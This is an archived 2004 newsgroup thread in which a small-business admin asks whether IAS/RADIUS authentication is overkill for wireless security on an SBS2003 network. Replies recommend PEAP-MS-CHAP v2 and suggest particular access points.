Security, Access Points and Radius in A SBS network - Is IAS Overkill?

Security, Access Points and Radius in A SBS network - Is IAS Overkill?

Post by Aaro » Mon, 02 Feb 2004 08:21:39


Hello all.

I have a SMALL SBS2003 Domain with approx. 20 users internally and an
additional 5-6 Laptop users (and possbly some wireless PDA/iPaq users
eventually)


Now that I have a growing number of users with Laptops with wireless
capabilities, They are wanting the same convince they have at home (in terms
of being able to roam their house wirelessly). Apparently now they feel they
MUST have the same ability at the office. Actually there really is a BIG
need to have everyone connected in the conference room without having CAT5
tangled all over the place.

So I am now at the point of deciding which AP to buy, and what is the best
way to implement SECURITY. I am at the moment leaning toward WPS-PSK to
implement security (at least initially), and to that end have selected a
number of AP's to consider for purchase.

In addition to those AP's that support WPA-PSK, I am also looking at units
that support 802.1x. so that (at some point in the future) I _could_
implement IAS and use RADIUS authentication. My primary question: Would IAS
be overkill foa a _SMALL_ SBS network or would WPA with pre-shared keys be
sufficient???

The AP's I am currently considering are:

1)Proxima Orinoco AP-600b/g ($350 at CDW) (This is my favored one, assuming
that TPTB will cough up the cash ;-)
2) D-link DWL-2100ap $229
3) USR Turbo access point (5450) $209
4) Dlink DWL-200AP $99 (DOESN't support RADIUS auth., but does support
WPA-PSK and is considerably less expensive)

Note: I like Dlink products, and have had good luck with them. At home I use
the DI-614+ router and a DWL-650+ card in my Laptop (both are only 802.11b
but they suit my needs). These units supported 256 bit WEP while most
others only had 128, and they now also offer WPA ( but I will have to buy a
supplicant from Funk for my W2k Pro Laptop). Anyway they have worked quite
well and kept my network secure (or at least as secure as WEP would allow)
as possible (I rotated keys frequently). Prior to wireless I had (and still
have) a DI-704 router. This is also a great little unit, and it also lets me
attach an external modem to it so that if my DSL goes down, I simply log
into the unit and switch over to dial-up. All my Dlink stuff has worked well
and been relatively inexpensive - lotsa "bang for the buck"!

Anyway, any comments, opinions and recommendations welcome.

Aaron
 
 
 

Security, Access Points and Radius in A SBS network - Is IAS Overkill?

Post by James McIl » Wed, 04 Feb 2004 07:53:23

i Aaron --

I think if you deployed IAS with secure password authentication using PEAP
(Protected Extensible Authentication Protocol) you would be really happy
with the strong security it provides.The compatible clients are XP SP1,
Pocket PC 2002, and W2K with the 802.1X pack installed.

PEAP is encapsulated by 802.1X, so you would need an 802.1X-compatible AP,
although I can't recommend a specific AP for you.

When you configure PEAP on the IAS server to use MS-CHAP v2 (PEAP-MS-CHAP
v2), you wind up with secure password authentication. Here are some of the
advantages:

-- Mutual authentication. The IAS server authenticates itself to the client
using a Server Certificate. The user provides user name and password. You
can deploy Certificate Services on your network (Included with Windows
Server 2003) to enroll a Server Certificate to your IAS server, or you can
purchase a server cert from a third party company like Verisign or Thawte.

-- Peap enables fast reconnect, so if your company grows and you need to
add APs, when users wander from one AP to another, they are automatically
reauthenticated and are not prompted for credentials

-- PEAP creates a secure Transport Layer Security (TLS) tunnel before
transmitting any information, so nothing is sent in the clear.

-- PEAP uses the AP as a pass-through, so the AP only forwards messages
between client and server. (So if someone hacks your AP they can't grab any
info)

Those are just a few of the security benefits. If you're interested, you
should check out two whitepapers at the IAS site:

http://www.microsoft.com/windowsserver2003/technologies/ias/default.mspx

1. The Advantages of Protected Extensible Authentication Protocol (PEAP)
2. Enterprise Deployment of Secure 802.11 Networks Using Microsoft Windows
3. Obtaining and Installing a VeriSign WLAN Server Certificate for PEAP-MS-
CHAP v2 Wireless Authentication

Hope that helps! :-)

"Aaron" < XXXX@XXXXX.COM > wrote in
news: XXXX@XXXXX.COM :




--
James McIllece, Microsoft

Please do not send email directly to this alias. This is my online account
name for newsgroup participation only.

This posting is provided "AS IS" with no warranties, and confers no rights.

 
 
 

Security, Access Points and Radius in A SBS network - Is IAS Overkill?

Post by Wildcat » Sun, 08 Feb 2004 03:21:43

Hi,

Personally, I'd look at the Colubris CN1050 (under $800)
or the SonicWall TZW (~$500). Using these access points
that have REAL integrated firewalls, you can achive a
high level of security and still provide flexible
authentication and access controls.

Search Google, and you'll find that they are both very
highly rated. I used the Colubris 1050 at a CWSP course,
and it was beautiful(full featured and easy to set up).
I manage many SonicWalls, and they are a snap. You can't
go wrong. Hope this helps.

http://www.yqcomputer.com/

This issue of PC Mag had many reviews. Check it out.
http://www.yqcomputer.com/ ,4149,1277246,00.asp
http://www.yqcomputer.com/ ,4149,1277272,00.asp


internally and an
PDA/iPaq users
with wireless
have at home (in terms
Apparently now they feel they
really is a BIG
without having CAT5
and what is the best
toward WPS-PSK to
have selected a
also looking at units
future) I _could_
question: Would IAS
pre-shared keys be
favored one, assuming
but does support
them. At home I use
(both are only 802.11b
WEP while most
will have to buy a
have worked quite
as WEP would allow)
wireless I had (and still
and it also lets me
down, I simply log
stuff has worked well
buck"!
welcome.